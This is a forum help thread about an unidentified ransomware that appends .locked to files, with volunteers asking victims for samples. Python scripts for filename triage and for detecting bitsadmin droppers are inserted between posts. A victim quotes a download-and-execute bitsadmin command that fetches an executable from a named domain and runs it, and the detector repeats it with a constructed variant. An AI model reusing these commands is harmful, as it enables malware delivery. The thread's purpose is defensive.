Zyklon Locker (GNL) Help Topic - .locked and UNLOCK_FILES_INSTRUCTIONS.html


52 replies to this topic

#1 stefanb
  • Members
  • 4 posts

Posted 16 April 2016 - 11:52 AM

Hi there,

 

I came across this website after using Google to get info about ransomware, glad I found this!

I hope you can help me out.

Since an hour ago I found out my files got the .locked extension, which I found strange; then on the desktop and in lots of folders I found 2 notes.

 

a html file : UNLOCK_FILES_INSTRUCTIONS

a text file: UNLOCK_FILES_INSTRUCTIONS

 

The text file says this: Open the UNLOCK_FILES_INSTRUCTIONS.html file with your internet browser for instructions.

I can't find any name once I open the files of which kind of ransomware program it is.

I hope you can help me out.

Thanks

 

Edit:

I see all my files that are locked are like:

bill.!ID!8MMnF!ID!.locked

The word bill is not the ransom program, just something I used as an example; the string !ID!8MMnF!ID!. is shown in the locked files.


Edited by stefanb, 16 April 2016 - 12:08 PM.
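As an added example (not part of the original post and not a BleepingComputer tool), the following Python triage script recognises the filename pattern reported above, recovers the pre-encryption filename and pulls out the victim ID, so that a hit count and the ID can be quoted when submitting samples. It assumes that everything before `.!ID!` is the original filename including its extension (the post only says that `bill` is a placeholder) and that ransom notes are named `UNLOCK_FILES_INSTRUCTIONS.html`/`.txt` as described. All sample paths are constructed. Recognising the pattern does not decrypt anything; the script only reports.

```python
import re
from collections import Counter

# Constructed sample paths following the pattern reported in the thread
# (bill.!ID!8MMnF!ID!.locked); not data from a real infected machine.
SAMPLE_NAMES = [
    r"C:\Users\stefan\Documents\bill.!ID!8MMnF!ID!.locked",
    r"C:\Users\stefan\Pictures\holiday.jpg.!ID!8MMnF!ID!.locked",
    r"\\NAS\share\invoices\2016-03.xlsx.!ID!8MMnF!ID!.locked",
    r"C:\Users\stefan\Documents\report.docx",
    r"C:\Users\stefan\Desktop\UNLOCK_FILES_INSTRUCTIONS.html",
    r"C:\Users\stefan\Desktop\UNLOCK_FILES_INSTRUCTIONS.txt",
]

# Assumption: <original name incl. extension>.!ID!<victim id>!ID!.locked
LOCKED_RE = re.compile(r"^(?P<orig>.+)\.!ID!(?P<id>[^!\\/]+)!ID!\.locked$")
# Ransom note names as reported in the thread.
RANSOM_NOTES = {"UNLOCK_FILES_INSTRUCTIONS.html", "UNLOCK_FILES_INSTRUCTIONS.txt"}


def basename(path):
    """Last component of a Windows or UNC path, independent of the host OS."""
    return re.split(r"[\\/]", path)[-1]


def parse_locked_name(path):
    """Return (original_filename, victim_id) for an encrypted file, else None."""
    m = LOCKED_RE.match(basename(path))
    if not m:
        return None
    return m.group("orig"), m.group("id")


def triage(paths):
    """Classify paths into encrypted files, ransom notes and untouched files.

    Also counts victim IDs (one machine should show a single ID) and the
    original extensions that were hit, which helps when comparing cases.
    """
    report = {"encrypted": [], "notes": [], "untouched": [],
              "ids": Counter(), "extensions": Counter()}
    for p in paths:
        name = basename(p)
        parsed = parse_locked_name(p)
        if parsed:
            orig, victim_id = parsed
            report["encrypted"].append((p, orig))
            report["ids"][victim_id] += 1
            ext = orig.rsplit(".", 1)[1].lower() if "." in orig else "(none)"
            report["extensions"][ext] += 1
        elif name in RANSOM_NOTES:
            report["notes"].append(p)
        else:
            report["untouched"].append(p)
    return report


def summary(paths):
    """Short text summary suitable for pasting into a support request."""
    r = triage(paths)
    ids = ", ".join(f"{i} ({n} files)" for i, n in r["ids"].most_common())
    return (f"{len(r['encrypted'])} encrypted, {len(r['notes'])} ransom notes, "
            f"{len(r['untouched'])} untouched; victim id(s): {ids or 'none'}")


if __name__ == "__main__":
    print(summary(SAMPLE_NAMES))
    for locked, orig in triage(SAMPLE_NAMES)["encrypted"]:
        print(f"{locked} -> original name {orig}")
```

Run it over a directory listing (for example the output of `dir /s /b` saved to a file) rather than over live files; reading names is enough for triage and avoids touching evidence before a sample has been analysed.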




#2 cybercynic
  • Members
  • 544 posts
  • Gender:Male
  • Location:Edge Of Tomorrow

Posted 16 April 2016 - 12:09 PM


Upload a copy of the ransom note and a copy of an encrypted file to:

 

https://id-ransomware.malwarehunterteam.com/

 

If it is a known ransomware, the site will identify it. The files will also be reviewed by Demonslay.


We are drowning in information - and starving for wisdom.


#3 stefanb
  • Topic Starter
  • Members
  • 4 posts

Posted 16 April 2016 - 12:13 PM

Hey,

Thanks for the quick reply.

I did this but it's not a known ransomware.

I tried to make a screenshot of it and show it here, but it looks like Paint and lots of programs are gone somehow on the PC.



#4 cybercynic
  • Members
  • 544 posts
  • Gender:Male
  • Location:Edge Of Tomorrow

Posted 16 April 2016 - 12:18 PM

Upload the same files here:

 

 http://www.bleepingcomputer.com/submit-malware.php?channel=168

 

They will be reviewed by BC analysts. That may take some time. 




#5 stefanb
  • Topic Starter
  • Members
  • 4 posts

Posted 16 April 2016 - 12:27 PM

This is the website (note) I get.

Made this photo with my phone.

w27ZShw.jpg


Edited by stefanb, 16 April 2016 - 12:28 PM.


#6 cybercynic
  • Members
  • 544 posts
  • Gender:Male
  • Location:Edge Of Tomorrow

Posted 16 April 2016 - 12:39 PM

If you've uploaded an encrypted file to the site I mentioned in my last post, someone will be along presently to look at this topic. Demonslay or some other BC analyst will need to look at this ransomware. Again, this may take some time. These people are all volunteers, and have a life outside of this website. 




#7 stefanb
  • Topic Starter
  • Members
  • 4 posts

Posted 16 April 2016 - 12:41 PM

I have uploaded it, yes.

Of course I know these people don't check this website all the time; I thought I'd give them as much information as possible to help.



#8 Demonslay335
    Ransomware Hunter
  • Security Colleague
  • 3,000 posts
  • Gender:Male
  • Location:USA

Posted 16 April 2016 - 02:43 PM

I've taken a look at the files you submitted. It looks new, haven't seen a ransom note that looks like that.

 

Based on the extension, it may be another HiddenTear/EDA2 variant. We will need the original executable of the malware to analyze and confirm if there is a method of cracking it.

 

If you can find any suspicious files that look like it may be the ransomware, please submit them here: http://www.bleepingcomputer.com/submit-malware.php?channel=168

 

You may scan with HitmanPro and MalwareBytes to look for any infections if you haven't seen anything.


ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

CryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#9 Blister2016
  • Members
  • 2 posts

Posted 19 April 2016 - 02:18 PM

Dear all

 

Same ransomware at a customer....

He is infected with a little bat file.

In his %APPDATA%\Roaming dir was a little .bat file: freepalistine.bat, with the following content:

bitsadmin  /transfer myjob  /download  /priority high http://www.firemail.online/download.exe "%APPDATA%\Hdgdgdte.exe">nul&start %APPDATA%\Hdgdgdte.exe

In other words, he downloaded an executable from the domain. I have already cleaned up the virus with ESET Online Scanner, MalwareBytes and some other tools.

The files are unfortunately still encrypted and have the .locked extension. Also a NAS is compromised. No backup of that NAS.

Do you have suggestions?
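The batch file above is a plain download-and-execute dropper: BITS fetches a payload over cleartext HTTP into the user's roaming profile, the redirect hides the output, and `start` runs it. As an added example (not from the post and not a vendor rule), here is a Python detector for that pattern, meant to be run over process-creation command lines such as Sysmon Event ID 1 or EDR telemetry exported as text. The first sample command line reproduces the posted bat content; the other samples, the scoring weights and the "alert" threshold are constructed here for illustration.

```python
import re

# Constructed sample process command lines. The first is the dropper line
# quoted in the post above; the rest are made up (benign and malicious).
SAMPLE_CMDLINES = [
    r'bitsadmin  /transfer myjob  /download  /priority high http://www.firemail.online/download.exe "%APPDATA%\Hdgdgdte.exe">nul&start %APPDATA%\Hdgdgdte.exe',
    r'bitsadmin /transfer wsus /download /priority normal https://updates.corp.example/agent.msi C:\Temp\agent.msi',
    r'cmd.exe /c bitsadmin /transfer j /download http://203.0.113.5/x.exe %TEMP%\x.exe & start %TEMP%\x.exe',
    r'powershell.exe -File C:\Scripts\backup.ps1',
]

# bitsadmin used to fetch a file, either the one-shot /transfer form or
# a job built with /addfile (the /create + /resume variant).
BITS_RE = re.compile(r"\bbitsadmin(?:\.exe)?\b.*?/(?:transfer|addfile)\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# Destinations a non-admin user can write to and execute from.
USER_WRITABLE_RE = re.compile(
    r"%(?:APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE|PUBLIC)%|\\Users\\|\\ProgramData\\",
    re.I)
# Command chaining straight into an execution primitive.
CHAINED_EXEC_RE = re.compile(
    r"(?:&&?|\|\|?)\s*(?:start|cmd|rundll32|regsvr32|wscript|cscript|powershell)\b",
    re.I)
EXEC_EXT_RE = re.compile(r"\.(?:exe|dll|scr|bat|cmd|ps1|vbs|js|hta)$", re.I)

ALERT_THRESHOLD = 4  # illustrative threshold, tune against your own telemetry


def destination_of(cmd, url):
    """Best-effort local path argument that follows the remote URL."""
    rest = cmd.split(url, 1)[1]
    rest = re.split(r"[>&|]", rest, 1)[0]   # stop at redirection or chaining
    return rest.strip().strip('"')


def assess_cmdline(cmd):
    """Score one command line; None when bitsadmin is not fetching a file."""
    if not BITS_RE.search(cmd):
        return None
    urls = URL_RE.findall(cmd)
    dest = destination_of(cmd, urls[0]) if urls else ""
    score, reasons = 1, ["bitsadmin_download"]
    if any(u.lower().startswith("http://") for u in urls):
        score += 1
        reasons.append("cleartext_http")
    if USER_WRITABLE_RE.search(dest):
        score += 1
        reasons.append("user_writable_destination")
    if EXEC_EXT_RE.search(dest):
        score += 1
        reasons.append("executable_payload")
    if CHAINED_EXEC_RE.search(cmd):
        score += 2
        reasons.append("chained_execution")
    verdict = "alert" if score >= ALERT_THRESHOLD else "review"
    return {"cmd": cmd, "urls": urls, "destination": dest,
            "score": score, "reasons": reasons, "verdict": verdict}


def scan(cmdlines):
    """Return findings for every command line that uses bitsadmin to download."""
    return [f for f in (assess_cmdline(c) for c in cmdlines) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"{f['verdict']:6} score={f['score']} {f['reasons']} -> {f['destination']}")
```

Two caveats. The rule only sees the one-liner `/transfer` and `/addfile` forms; a job assembled with `/create`, `/setnotifycmdline` and `/resume` (a known persistence trick) and PowerShell's `Start-BitsTransfer` need their own rules. And `%APPDATA%` already expands to `...\AppData\Roaming`, so the destination in the posted line is the user's roaming profile directory, exactly the kind of user-writable location the `user_writable_destination` reason is meant to flag.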



#10 Demonslay335
    Ransomware Hunter
  • Security Colleague
  • 3,000 posts
  • Gender:Male
  • Location:USA

Posted 19 April 2016 - 02:23 PM

The account has been suspended, so the download is inactive (good and bad). Is the Hdgdgdte.exe still available from quarantine?

 

If you have any suspicious files in quarantine, we need a sample in order to assess the ransomware and whether there is a flaw with it. You may submit any samples you find to the link I provided in the previous post.




#11 luuksie
  • Members
  • 6 posts

Posted 10 May 2016 - 12:29 PM

Same problem and ransomware as Blister2016.

- *.locked files

- freepalestine.bat file

etc. etc.

We paid 0.5 bitcoin and received the passwords but no decryption.

What can we do?

Thanks a lot!



#12 Demonslay335
    Ransomware Hunter
  • Security Colleague
  • 3,000 posts
  • Gender:Male
  • Location:USA

Posted 10 May 2016 - 01:05 PM


Please post any suspicious files, the password they gave you, and a sample encrypted file here: http://www.bleepingcomputer.com/submit-malware.php?channel=168




#13 luuksie
  • Members
  • 6 posts

Posted 10 May 2016 - 01:56 PM

Just uploaded 3 files. If you need more, please let me know!

Thanks so much!



#14 Demonslay335
    Ransomware Hunter
  • Security Colleague
  • 3,000 posts
  • Gender:Male
  • Location:USA

Posted 10 May 2016 - 03:02 PM


Thanks. I've been suspecting this may be a HiddenTear variant, but my decrypter didn't work with those passwords (could just be they altered the algorithm if it is still derived from HT).

 

Do you have that batch file still? We really need a sample of the malware itself to analyze now.




#15 luuksie
  • Members
  • 6 posts

Posted 10 May 2016 - 03:11 PM

Just uploaded 2 batch files.





